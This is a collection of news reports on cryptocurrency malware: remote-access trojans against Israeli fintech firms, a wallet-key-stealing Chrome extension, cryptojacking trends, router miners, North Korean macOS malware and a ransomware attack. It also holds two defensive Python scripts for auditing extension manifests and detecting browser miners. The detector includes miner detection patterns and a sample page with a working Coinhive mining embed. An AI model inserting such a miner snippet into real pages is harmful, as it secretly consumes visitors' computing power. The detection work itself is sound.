Posted on

Report: Malware Targets Israeli Fintech Firms Working in Crypto, Forex Trading

According to a cybersecurity company, Israeli fintech companies are being targeted by malware.

Israeli fintech companies that work with forex and crypto trading are being targeted by malware, according to a blog post from threat research department Unit 42 of cybersecurity company Palo Alto Networks published on March 19.

Per the report, Unit 42 first encountered an older version of the malware in question, Cardinal RAT, in 2017. Since April 2017, Cardinal RAT has been identified in attacks against two Israel-based fintech companies that develop forex and crypto trading software. The malware is a Remote Access Trojan (RAT), which gives the attacker remote control of the infected system.

The updates applied to the malware aim to evade detection and hinder its analysis. After explaining the obfuscation techniques employed by the malware, the researchers explain that the payload itself does not vary significantly compared to the original in terms of modus operandi or capabilities.

The malware can collect victim data, update its settings, act as a reverse proxy, execute commands, and uninstall itself. It can also recover passwords, download and execute files, log keystrokes, capture screenshots, update itself and clear browser cookies. Unit 42 notes that the attacks it observed using this malware targeted fintech firms engaged in forex and crypto trading, primarily based in Israel.

The report further claims that the threat research team discovered a possible correlation between Cardinal RAT and a JavaScript-based malware dubbed EVILNUM, which is used in attacks against similar organizations. When looking at files submitted by the same customer in a similar timeframe to the Cardinal RAT samples, Unit 42 reportedly also identified EVILNUM instances.

The post further notes that this malware, too, appears to be used only in attacks against fintech organizations. While researching the data, the company claims to have found another case in which an organization submitted both EVILNUM and Cardinal RAT samples on the same day, which is particularly noteworthy since both malware families are rare.

EVILNUM is reportedly capable of establishing persistence on the system, running arbitrary commands, downloading additional files and taking screenshots.

As Cointelegraph recently reported, a Google Chrome browser extension tricking users into participating in a fake airdrop from cryptocurrency exchange Huobi claimed over 200 victims.

Also, a report noted last week that cybercriminals are reportedly favoring unhurried approaches in attacks made for financial gains, with cryptojacking as a prime example of this shift.


Google Deletes Crypto Malware Targeting Blockchain.com, MyEtherWallet Users

The malicious Google Chrome web extension was tied to a fake token airdrop from cryptocurrency exchange Huobi.

A Google Chrome browser extension tricking users into participating in a fake airdrop from cryptocurrency exchange Huobi claimed over 200 victims, a security researcher reported in a blog post on March 14.

The extension for Chrome web browser, with the name NoCoin, gained 230 downloads before Google deleted it, according to Harry Denley, who runs cryptocurrency scam database EtherscamDB.

Denley noted that hackers had purposely disguised the malicious extension to look like a tool protecting users from cryptocurrency malware or so-called cryptojacking.

“From the start, it looked like it did what it should — it was detected [sic] various CryptoJacking scripts […] and there was a nice UI to let me know it was doing its job,” he explained in the blog post.

Behind the facade, however, the extension captured private keys that users entered into the popular wallet interfaces MyEtherWallet (MEW) and Blockchain.com. The keys were then sent to the attackers, who could use them to empty the wallets.

The extension lay at the end of a fake giveaway campaign, ostensibly from crypto exchange Huobi, which offered worthless ERC20 Ethereum network-based tokens to unwitting consumers.
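An extension of this kind has to be able to run inside the wallet page, and that shows up in its manifest before any of its code has to be read. The script below is an added example (not the researcher's tooling and not Google's review logic): it parses a Chrome Manifest V2 manifest.json and flags content scripts whose match patterns reach wallet domains, plus permissions that allow broad reading or exfiltration of page data. The two wallet domains, the list of "risky" permissions, and the sample manifest are assumptions constructed for this example, not the real NoCoin manifest.

```python
import json
import re
import sys

# Wallet front-ends the article says the extension targeted. Treating these two
# registrable domains as "sensitive" is an assumption made for this example.
WALLET_DOMAINS = {"myetherwallet.com", "blockchain.com"}

# Manifest V2 permissions that let an extension read or exfiltrate page data at
# scale; the list is a judgement call for this example, not a Chrome rule.
RISKY_PERMISSIONS = {
    "<all_urls>", "webRequest", "webRequestBlocking", "tabs",
    "clipboardRead", "cookies", "nativeMessaging",
}

MATCH_PATTERN = re.compile(r"^(\*|https?|file|ftp)://([^/]*)/.*$")


def pattern_covers(pattern, domain):
    """True if a Chrome match pattern can reach pages on `domain` or its subdomains.

    Handles the shapes that matter: "<all_urls>", a "*" host, a "*." host
    wildcard, and a literal host. Anything that is not a match pattern (e.g.
    the API permission "storage") returns False.
    """
    if pattern == "<all_urls>":
        return True
    m = MATCH_PATTERN.match(pattern)
    if not m:
        return False
    host = m.group(2).lower()
    if host == "*":
        return True
    if host.startswith("*."):
        base = host[2:]
        return domain == base or domain.endswith("." + base)
    # Literal host: flags the apex and any subdomain of a wallet domain, but not
    # look-alikes such as "myetherwallet.com.evil.example".
    return host == domain or host.endswith("." + domain)


def audit_manifest(manifest):
    """Return a list of human-readable findings for a parsed manifest.json."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))

    for perm in sorted(perms & RISKY_PERMISSIONS):
        findings.append("broad permission: %s" % perm)

    # Under Manifest V2, host permissions live in the same list as API permissions.
    for domain in sorted(WALLET_DOMAINS):
        for perm in sorted(perms):
            if pattern_covers(perm, domain):
                findings.append("host permission %s covers wallet domain %s" % (perm, domain))

    # Content scripts are the real danger: they run inside the wallet page and can
    # read the DOM, including a private-key field, before anything is submitted.
    for idx, cs in enumerate(manifest.get("content_scripts", [])):
        for domain in sorted(WALLET_DOMAINS):
            hit = next((p for p in cs.get("matches", []) if pattern_covers(p, domain)), None)
            if hit is not None:
                findings.append("content script #%d %s injects into %s pages via %s"
                                % (idx, cs.get("js", []), domain, hit))
    return findings


# Constructed sample: a manifest shaped like a "cryptojacking blocker" that also
# plants a script on wallet pages. Not the real extension's manifest.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "example-blocker",
  "version": "1.0",
  "permissions": ["webRequest", "webRequestBlocking", "<all_urls>", "storage"],
  "content_scripts": [
    {
      "matches": ["*://*.myetherwallet.com/*", "https://*.blockchain.com/*"],
      "js": ["keys.js"],
      "run_at": "document_end"
    }
  ]
}
""")


if __name__ == "__main__":
    # Usage: python audit_extension.py [path/to/manifest.json]
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            target = json.load(fh)
    else:
        target = SAMPLE_MANIFEST
    for line in audit_manifest(target) or ["no findings"]:
        print(line)
```

A blocker that genuinely only filters mining scripts needs `webRequest` and broad host access, so those permissions alone are not proof of anything; the combination with a content script scoped to wallet hosts is what should stop a review.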

It is unknown how long the extension remained available for Google Chrome users.

As Cointelegraph continues to report, bad actors targeting cryptocurrency users have sought increasingly nefarious methods of tricking novices into handing over access to funds. Just this week, a report identified cryptojacking as a sign of increasingly discreet behavior among hackers.

Google itself has come under fire for an apparent lack of diligence in the past; in February it pulled a fake version of the popular Ethereum wallet MetaMask from its Play store.

As Cointelegraph reported last month, users of cryptocurrency wallets Electrum and MEW were also facing phishing attacks, according to posts published on Reddit and Twitter.


Report Shows Cryptojacking Is Prime Example of Shift Towards Discreet Cyberattacks

A recent report shows that cryptojacking is a prime example of cybercriminals’ shift to “low and slow” attack approaches.

Cybercriminals are reportedly favoring unhurried approaches in attacks made for financial gains, with cryptojacking as a prime example of this shift. IT news website ComputerWorld reported on this development on March 14.

Data released by cybersecurity company Darktrace reveals that cryptojacking attempts increased by 78 percent in 2018, and, according to ComputerWorld, the company also said that this trend continued in 2019.

The ComputerWorld article cites Max Heinemeyer, director of threat hunting at Darktrace, commenting on the findings. He reportedly said that since many ransomware victims may be unable to pay a ransom in Bitcoin (BTC) due to technical ineptitude, cryptojacking might be a better approach.

He added that “it [cryptojacking] is low and slow and guarantees a profit,” while ransomware does not. ComputerWorld also quotes Heinemeyer as stating that the barriers to entry to creating cryptojacking malware are low.

Heinemeyer also said that other methods, such as stealing credit card credentials, are cumbersome since criminals need to establish money laundering networks in order to avoid law enforcement. Lastly, he also noted:

“We’ve seen so many different variants of how these pieces of malware are spreading or being loaded.”

Per the report, he cited a company based out of the United Kingdom that saw over 400 devices very quickly infected by a cryptojacking malware after an initial infection via a phishing email. Also, according to Heinemeyer, one system admin installed a mining device underneath the floorboards of the data center where he worked at a major European bank in a creative cryptojacking move.

The article also suggests that such attacks mine Monero (XMR), since unlike Bitcoin it can be mined on non-specialized, even consumer-grade, hardware. Cointelegraph recently reported that a Monero upgrade has made the coin more resistant to ASIC mining, which keeps it mineable on ordinary CPUs.

As Cointelegraph has reported, of about 400 servers running the container platform Docker that were found to be exposed to outside exploitation, most were seemingly running Monero mining software.

Also, United States-based software corporation Microsoft has removed eight Windows 10 applications from its official app store after cybersecurity firm Symantec identified the presence of surreptitious Monero coin mining code in February.


Cryptojacking Overtakes Ransomware as Top Malware in Some Countries

Malware that uses infected hardware for mining crypto without authorization has become the top cyber threat in certain countries.

Cryptojacking, the unauthorized use of another’s hardware to mine cryptocurrency, has become the biggest cyber threat in many parts of the world, Bloomberg reported Dec. 14.

According to research from cybersecurity firm Kaspersky Lab, cryptojacking has overtaken ransomware as the biggest cybersecurity threat, particularly in the Middle East, Turkey and Africa. In Afghanistan and Ethiopia, more than one in four malware detections are cryptocurrency miners, according to Kaspersky’s data.

As cited by Bloomberg, Kaspersky’s research “shows crypto mining attacks have risen almost fourfold in the region, from 3.5 million in 2017 to 13 million this year.” The cybersecurity firm reportedly also claimed that cryptojacking incidents are “likely to continue given the increased use of digital currencies.”

A report released by Kaspersky in November declares that the reason for the rise of cryptojacking malware compared to ransomware may “be due to the fact that people from developing markets are not so eager to pay a ransom.”

Not only PC users but also smartphone users are targeted by unauthorized mining software: from the 2016-2017 period to the 2017-2018 period, these attacks reportedly increased by 9.5 percent.

Fabio Assolini, Kaspersky’s Senior Security Researcher, told Bloomberg that “the [Middle East, Turkey, Africa] region is becoming more appealing to cyber-criminals, with financial and malicious cryptomining attacks taking center stage.” Assolini also claimed that such attacks are becoming increasingly popular because they are “less noticeable” than ransomware.

Still, the growth of this kind of malware has not been uniform worldwide. This year, for instance, the firm registered a decrease of 15 percent in Zambia and 11 percent in Uzbekistan. The report concludes:

“Last year we asked what tips the scales for cybercriminals? Today, this is no longer a question. Miners will keep spreading across the globe, attracting more people.”

Cryptojacking is not the only way in which cybercriminals use cryptocurrency. As Cointelegraph reported in October, users of the popular video game Fortnite have been targeted by a malware that steals Bitcoin (BTC) wallet addresses.

Individuals are not the only ones pursuing such financial gains. According to a Chinese cybersecurity company, North Korean hackers, after targeting cryptocurrency exchanges, have started to steal cryptocurrency from individuals.


Report: Number of Routers Affected by Crypto Malware Doubled Since August, Reaching 415K

A security researcher claims that the number of MikroTik routers affected by cryptojacking malware has doubled since August 2018.

The number of MikroTik routers affected by cryptojacking malware has reportedly doubled since summer 2018, reaching 415,000, security researcher VriesHd tweeted Sunday, Dec. 2.

Since August, VriesHd has been reporting on crypto malware that targets routers and forces them to mine cryptocurrencies along with the researchers from Bad Packets Report.

They revealed that routers made by MikroTik, a Latvian manufacturer of network equipment, were compromised to serve at least 16 different types of malware, including Coinhive, a browser-based script that mines the privacy-oriented cryptocurrency Monero (XMR).

By September, the estimated number of compromised routers surpassed 280,000, according to Bad Packets. In the recent tweet, VriesHd explains that he has checked only three possible ways to abuse MikroTik routers, although there may be several more. His review, based only on preliminary projections, shows 415,000 routers affected.

As VriesHd told tech news outlet The Next Web, the attackers have recently switched from Coinhive to other mining software, such as Omine and CoinImp. He also noted that the exact number might be slightly off, as the data only reflects IP addresses infected. However, he believes the number is still high. “It wouldn’t surprise me if the actual number […] would be somewhere around 350,000 to 400,000,” VriesHd said.

As Cointelegraph previously reported, Brazil is the country most affected by cryptojacking. According to research by Iran’s cybersecurity authority, Brazil was hit over 81,000 times by Coinhive in October alone. India came in second with around 29,000 incidents, followed by Indonesia with more than 23,000. Iran itself experienced around 11,000.

According to a Bloomberg report, the total number of crypto mining malware infections increased 500 percent this year after code targeting Microsoft systems was allegedly stolen from the U.S. National Security Agency (NSA).

Another report by network and enterprise security company Palo Alto Networks found that around 5 percent of all Monero in circulation was mined through cryptojacking.


Firefox to Block Cryptojacking Malware in New Browser Releases

Mozilla will block cryptojacking scripts in future versions of its Firefox web browser, according to an announcement on August 30.

The move comes as part of an anti-tracking initiative expected to be implemented over the next few months. In the announcement, Mozilla cites a study by the browser extension Ghostery, stating that 55.4 percent of the total time required to load an average website is spent loading third-party trackers.

Future versions of Firefox will reportedly block by default practices such as cryptomining scripts that “silently mine cryptocurrencies” on users’ devices. By blocking tracking and offering a “clear set of controls,” Mozilla is looking to give its users more choice over what data they share with websites.
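Browser-side miners reach victims either through scripts a compromised router injects into traffic, as with the MikroTik campaign described earlier on this page, or through scripts a site embeds itself, which is what the Firefox blocking above targets. The detector below is an added example (not Mozilla’s, Bad Packets’ or VriesHd’s code): it scores a response body on miner indicators, lists external script URLs so an injected one stands out, and emulates a block list by stripping matching script elements. The Coinhive library URL and JavaScript API are as that service documented them; the CoinImp and Omine hostnames, the weights and the threshold are assumptions, and the sample pages are constructed.

```python
import re

# Indicator table: (tag, regex, weight). The Coinhive library URL and its
# JavaScript API are how that service was actually embedded; the CoinImp and
# Omine hostnames and the weights are assumptions made for this example.
MINER_INDICATORS = [
    ("coinhive-lib", re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I), 5),
    ("coinhive-api", re.compile(r"CoinHive\.(Anonymous|User|Token)\s*\("), 5),
    ("coinimp",      re.compile(r"coinimp\.com", re.I), 4),
    ("omine",        re.compile(r"omine\.org", re.I), 4),
    ("cryptonight",  re.compile(r"cryptonight", re.I), 3),
    ("stratum",      re.compile(r"\bstratum\b", re.I), 2),
    ("throttle",     re.compile(r"throttle\s*:\s*0?\.\d+"), 1),
    ("websocket",    re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://"), 1),
]

SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
SCRIPT_ELEMENT = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def scan_response(body):
    """Score an HTML/JS response body for in-browser mining indicators.

    Returns (score, tags). Weak indicators such as a WebSocket or a throttle
    option only count in combination, so a chat page using WebSockets is not
    flagged on its own.
    """
    score, tags = 0, []
    for tag, rx, weight in MINER_INDICATORS:
        if rx.search(body):
            score += weight
            tags.append(tag)
    return score, tags


def is_miner(body, threshold=4):
    """Decision rule: threshold of 4 is an assumption tuned to the table above."""
    return scan_response(body)[0] >= threshold


def injected_script_urls(body):
    """External <script src> URLs in the body. On a page whose origin is known
    not to use third-party scripts, any entry here points at an injection such
    as the one a compromised router performs."""
    return SCRIPT_SRC.findall(body)


def strip_mining_scripts(body):
    """Block-list emulation: drop every <script> element (inline or external)
    that scores as a miner, leaving the rest of the markup untouched."""
    def keep_or_drop(match):
        return "" if is_miner(match.group(0)) else match.group(0)
    return SCRIPT_ELEMENT.sub(keep_or_drop, body)


# Constructed samples, not captured traffic. The site key is a placeholder.
INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.2});
  miner.start();
</script>
<p>Page content served through the router</p></body></html>"""

CHAT_PAGE = """<html><body>
<script>var ws = new WebSocket('wss://chat.example/socket'); ws.onmessage = function (e) {};</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("chat", CHAT_PAGE)):
        score, tags = scan_response(page)
        print("%s: score=%d tags=%s miner=%s external=%s"
              % (name, score, tags, is_miner(page), injected_script_urls(page)))
    print(strip_mining_scripts(INJECTED_PAGE))
```

The scoring is deliberately signature-heavy: the long tail of miners that proxy the stratum protocol over a WebSocket to an unknown host only surfaces through the weaker indicators, which is why a real blocker pairs a list like this with CPU-usage heuristics rather than relying on either alone.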

Back in 2016, Mozilla, the company behind the Firefox browser, implemented measures encouraging users to take care of their online privacy and security as part of an ongoing shift toward encryption. Firefox reportedly was to block connections to HTTPS servers using weak encryption and to establish a minimum of 1,023 bits for Diffie-Hellman keys in TLS handshakes.

Another major web browser, Opera, included anti-crypto mining in their integrated ad-blocker for desktop in December last year. Later in January, the company announced plans to add the feature to their mobile browser as well.

This month, Opera announced the launch of its desktop web browser with built-in crypto wallet functionality. As with the mobile app, the desktop client will support tokens as well as digital collectibles, with product lead of Opera Crypto Charles Hamel commenting that browser integration represents a further step in “making cryptocurrencies and Web 3.0. mainstream.”


North Korean Hackers Unleash Mac Malware On Crypto Exchanges

It seems that the only thing on the rise in the crypto industry at the moment is malware, not prices. Cyber security researchers have recently revealed more crypto-centric malware emerging from North Korea.

According to a detailed summary by Russian computer security firm Kaspersky, North Korean hacker group Lazarus has been highly active in recent months. The cyber criminals have “successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies,” according to the report.

The malware, named ‘AppleJeus’, was inadvertently downloaded by an employee of an unnamed crypto exchange. The researchers say they made the discovery unexpectedly while investigating the group’s attack on the exchange, which revealed that the victim had been compromised through a trojanized crypto trading application recommended to the company via email.

After the software was installed, the victim’s computer was infected with Fallchill malware, which Lazarus had used before. Kaspersky went on to state that this was the first time the group had deployed malware for other operating systems:

“To ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including for macOS. A version for Linux is apparently coming soon, according to the website. It’s probably the first time we see this APT group using malware for macOS.”

The payload came via a convincing but fake website, as the group strives to reach new levels of sophistication. The actual Trojan arrived as an update to the trading app, a further attempt to mask its presence. The Celas Trade Pro software from Celas Limited showed no signs of malicious behavior and looked genuine, according to the research.

In addition to the Mac version, there was a Windows version of the spurious trading program in a downloadable file called celastradepro_win_installer_1.00.00.msi. Once installed, the Updater.exe module delivers the payload, which is designed to steal cryptocurrency.

Kaspersky continued with a lengthy breakdown of how the malware operates and what it has discovered about the bogus company. Referring to Lazarus, it added: “Recent investigation shows how aggressive the group is and how its strategies may evolve in the future.” South Korean exchanges have been targets of Lazarus before, with a number of reported attacks earlier this year.

Crypto markets may be in decline but attempts to steal digital assets by hacker groups are definitely taking the opposite trend.



Kaspersky Lab: North Korea Hacks Cryptocurrency Exchange With ‘First’ macOS Malware

North Korean hackers have infected a cryptocurrency exchange with malware for both Windows and macOS, reportedly the first time the group has used macOS malware, Russian internet security company Kaspersky Lab announced Thursday, August 23.

In Kaspersky’s report, the company reveals the malware — dubbed “AppleJeus” — made its way into the systems of an unnamed exchange after an employee downloaded a “tainted” app. Kaspersky now believes the app came from a fake developer with fake security certificates in a major operation by North Korean hacker collective Lazarus Group.

The malware aimed to steal cryptocurrency funds, Kaspersky claims, in what marks the latest in a spate of both successful and failed attempts by North Korea in the crypto hacking space.

Kaspersky’s report states that in order to “ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including for macOS,” noting:

“A version for Linux is apparently coming soon, according to the website. It’s probably the first time we see this APT group using malware for macOS.”

South Korean exchanges have traditionally been the targets for Lazarus, with a rash of complaints surfacing with regard to attacks on platforms such as Bithumb, YouBit, and Coinlink.

Speaking to Bleeping Computer, Vitaly Kamluk, head of Kaspersky’s GReAT APAC team, added:

“The fact that they developed malware to infect macOS users in addition to Windows users and – most likely – even created an entirely fake software company and software product in order to be able to deliver this malware undetected by security solutions, means that they see potentially big profits in the whole operation.”

In early July, a group of security researchers discovered macOS malware attacks targeting Slack and Discord users talking about cryptocurrencies, with hackers impersonating “key people” in crypto-related chats and then sharing “small snippets” that download and execute a malicious binary.


Citrix Survey: More Than Half of UK Companies Hit by Cryptojacking Malware at Some Point

As much as 59 percent of U.K. companies have been affected by cryptojacking malware at some point, and roughly half of those cases took place in the previous month, news outlet Internet of Business reported August 15, citing research commissioned by Citrix.

According to Internet of Business, the research, commissioned by software company Citrix and performed by OnePoll, asked 750 IT executives at U.K. companies with more than 250 employees about their experience with cryptojacking attacks.

Cryptojacking malware employs its victim’s computational resources without their permission in order to mine cryptocurrencies for the attacker. This leads to a wasteful increase in electric power consumption and the slowing down of affected devices.

Citrix’s research claims that 59 percent of the respondents said that they have been hit with cryptojacking malware at some point. At least 80 percent of those cases took place in the past six months.

Thirty percent of all companies surveyed have said that they were affected within the previous month alone.


In terms of scale, 60 percent of the respondents said that up to 50 devices in their company had been hit, while in 11 percent of cases the number went up to 100.

As many as 67 percent of companies have formal policies in place for dealing with an attack once it is discovered, a surprisingly high number for such a recently emerged threat as cryptojacking, Internet of Business notes.

The threat of cryptojacking is very real for companies and individuals worldwide, with the number of attacks increasing by a whopping 629 percent in the first quarter of 2018, according to an earlier report by security firm McAfee Labs.

Although the interest in this vector of attack has reportedly plateaued in the second quarter of the year — mainly due to the decrease in cryptocurrency prices — the malware is still ubiquitous, in one case even being delivered to victims via a videogame on the Steam marketplace.


The PGA Falls Victim To Bitcoin Ransomware Attack

While cryptocurrency prices have taken a tumble, with valuations falling by upwards of 70%, ransomware still seems to be a medium of attack for cryptocurrency-focused hackers. As per an article from Golfweek, the Professional Golfers Association, a body representing the best golfers from around the globe, has been hit by a cyberattack.

The report from the golf news source pointed out how “shadowy bandits” locked PGA officials out of essential files, with this attack coming prior to two upcoming PGA Championships in the U.S. and France.

The news of this ransomware attack first emerged on Tuesday morning, when PGA staff members found themselves unable to access the files they needed to work on. When opening a file, staff were prompted with the following message, which made it clear to some that something was afoot:

 “Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm… We exclusively have decryption software for your situation. No decryption software is available in the public.”

As is common with ransomware attacks, the hackers also warned that any attempt to break the encryption could leave files permanently unrecoverable, writing:

“This may lead to the impossibility of recovery of certain files.”

Upon further investigation, the locked files were revealed to be creative materials for the upcoming championships, more specifically the promotional logos and banners to be used in digital and print advertising. It was also noted that the locked media includes development work on future PGA logos, which is near-irreplaceable and the product of PGA staff.

The message also included a Bitcoin wallet address, but the hackers did not specify an amount that the PGA should pay to regain control of its files. While the locked work is important, a person familiar with the matter expects the PGA to set the issue aside and not pay any ransom.

The promotional materials may be important to the PGA, but maybe not important enough to warrant a hefty sum, as the U.S.-based association has yet to discover cases of ransomware that will substantially impact the success of the upcoming tournament circuit.

Cryptojacking And Ransomware, Two Primary Methods of Crypto CyberAttack

Cryptojacking and ransomware have become growing issues as cryptocurrencies have exploded in value. While ransomware, the attack method described above, remains a hot topic within the hacker community, cryptojacking has quickly surpassed it to become the biggest cyber problem.

For those who are unaware, cryptojacking is a specific type of cybercrime that sees malicious hackers take control of a victim’s piece of technology, forcing the device to mine cryptocurrencies for the hacker’s personal gain. Cryptojacking malware, although generating only a few cents per device affected, can easily sweep across thousands, if not millions of computers, netting the hackers a nice reward.

Many hackers have begun to allocate their resources to cryptojacking instead of ransomware, as it is often unintrusive and goes under the radar of many consumers. As cybersecurity expert Troy Mursch put it:

“Ransomware is basically like pointing a gun at you and saying, ‘Hey, pay up or you’re not getting your files back,’ versus cryptojacking you might not even know about it, it’s just going to silently steal your electricity.”
